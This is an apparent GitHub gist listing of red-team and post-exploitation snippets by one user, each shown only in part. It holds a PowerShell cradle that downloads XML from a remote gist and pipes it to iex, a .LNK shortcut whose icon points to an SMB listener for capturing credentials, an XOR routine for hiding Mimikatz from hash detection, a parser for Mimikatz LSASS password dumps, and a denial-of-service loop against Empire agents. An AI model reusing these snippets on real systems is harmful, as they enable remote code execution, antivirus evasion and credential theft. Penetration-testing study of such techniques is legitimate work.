@breakersall
breakersall / Out of band interaction domains
Last active October 29, 2022 10:14
External service interaction domains
interact.sh
oast.pro
oast.live
oast.site
oast.online
oast.fun
oast.me
burpcollaborator.net
oastify.com
canarytokens.com
breakersall / EmpireAgentFlood.ps1
Created July 30, 2019 03:35
Empire Agent Flood - DoS
# Copied from Lee Holmes (@Lee_Holmes); code copied from https://www.youtube.com/watch?time_continue=206&v=1S9YNJpktBM
$ip = "8.8.8.8"
$port = "80"
$tcpClients = New-Object System.Collections.ArrayList
$Counter = 0
while($true)
{
"Launching Client $counter"
$counter++
breakersall / feedly.opml
Last active July 2, 2022 03:31
Feedly Security Feed
<?xml version="1.0" encoding="UTF-8"?>
<opml version="1.0">
<head>
<title>Matt subscriptions in feedly Cloud</title>
</head>
<body>
<outline text="RedTeaming" title="RedTeaming">
<outline type="rss" text="Strategic Cyber LLC" title="Strategic Cyber LLC" xmlUrl="http://blog.strategiccyber.com/feed/" htmlUrl="https://blog.cobaltstrike.com"/>
<outline type="rss" text="Silent Break Security" title="Silent Break Security" xmlUrl="http://silentbreaksecurity.com/feed/" htmlUrl="https://silentbreaksecurity.com"/>

Keybase proof

I hereby claim:

  • I am breakersall on github.
  • I am breakersall (https://keybase.io/breakersall) on keybase.
  • I have a public key ASDNWjIrvzU3731TQaVF4SQ8zzSuGTG46jMIxSvVgt9Gpgo

To claim this, I am signing this object:

breakersall / xml
Created June 21, 2017 23:32
xml with proxy
$proxy = [System.Net.WebRequest]::GetSystemWebProxy()
$proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials
$wc.proxy = $proxy
$d = New-Object System.Xml.XmlDocument
$d.Load($wc.DownloadData("https://gist.githubusercontent.com/subTee/47f16d60efc9f7cfefd62fb7a712ec8d/raw/1ffde429dc4a05f7bc7ffff32017a3133634bc36/gistfile1.txt"));
$d.command.a.execute | iex
breakersall / .LNK PowerShell Post Exploitation
Created September 29, 2016 23:22
Create .LNK UNC path via PS
$LinkedEXE = "$env:SystemRoot\System32\notepad.exe"
$LNKSaveFile = "pathtosavelnk"
$WScriptShell = New-Object -ComObject Wscript.Shell
$Shortcut = $WScriptShell.CreateShortcut($LNKSaveFile)
$Shortcut.TargetPath = $LinkedEXE
$Shortcut.IconLocation = "\\IPOFSMBLISTENER\images\images.ico"
$Shortcut.save()
breakersall / VBA-Python.txt
Created April 20, 2016 19:38
Example VBA calling and executing Python
Sub zxzcvzxcvzxvxzcv()
'
myAppleScript = "do shell script ""/usr/bin/python -c 'import webbrowser; webbrowser.open_new(\""http://google.com\"")' """
MacScript (myAppleScript)
'
End Sub
breakersall / gist:c32ff9b2b0fb9fc26c1a
Last active December 17, 2015 21:10
Example of xor'ing Mimikatz to avoid hash based detection
#######EncodeExample
$inputMim = "C:\Tools\Mimikatz.txt"
$OutMimEnc = "C:\Tools\EncMimikatz.txt"
$bytes = [System.IO.File]::ReadAllBytes("$inputMim")
$key = 137
for($i=0; $i -lt $bytes.count ; $i++)
{
$bytes[$i] = $bytes[$i] -bxor $key
}
[System.IO.File]::WriteAllBytes("$OutMimEnc", $bytes)
Function ParseMimiLsass
{
$UnameRegex = '^*[Username]{8}'
$DomainRegex = '^*[Domain]{6}'
$PassRegex = '^*[Password]{8}[ ][:]'
$Domains = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $DomainRegex | Select-Object Line
$Usernames = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $UnameRegex | Select-Object Line
$Passwords = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-64.txt -Pattern $PassRegex | Select-Object Line
$Domains32 = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-32.txt -Pattern $DomainRegex | Select-Object Line
$Usernames32 = select-string -Path $LootDirectory\Mimikatz-LSASS-OUT-32.txt -Pattern $UnameRegex | Select-Object Line
breakersall / gist:191d4a031704387475da
Last active August 29, 2015 14:16
Dump new users passwords
#Number of minutes to go
[int]$MinutesToCheck = 10080
function Find-4648Logons
{
<#
.SYNOPSIS
Retrieve the unique 4648 logon events. This will often find cases where a user is using remote desktop to connect to another computer. It will give
the account that RDP was launched with and the account name of the account being used to connect to the remote computer. This is useful
for identifying normal authentication patterns. Other actions that will trigger this include any runas action.
Function: Find-4648Logons